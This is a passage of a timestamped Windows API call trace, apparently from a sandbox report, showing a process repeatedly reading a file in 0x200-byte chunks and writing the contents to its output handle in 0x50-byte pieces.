returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.986] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.986] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.987] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.987] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.989] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.989] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.990] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.990] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] GetFileType (hFile=0x4c) returned 0x1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] GetFileType (hFile=0x4c) returned 0x1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] GetFileType (hFile=0x4c) returned 0x1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] GetFileType (hFile=0x4c) returned 0x1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.991] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.991] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] GetFileType (hFile=0x4c) returned 0x1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] GetFileType (hFile=0x4c) returned 0x1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] GetFileType (hFile=0x4c) returned 0x1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] GetFileType (hFile=0x4c) returned 0x1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] GetFileType (hFile=0x4c) returned 0x1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] GetFileType (hFile=0x4c) returned 0x1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.993] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.993] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.994] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.994] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.996] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.996] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.996] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x32, lpOverlapped=0x0) returned 1 [0140.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.996] GetFileType (hFile=0x4c) returned 0x1 [0140.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.996] GetFileType (hFile=0x4c) returned 0x1 [0140.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.996] WriteFile (in: 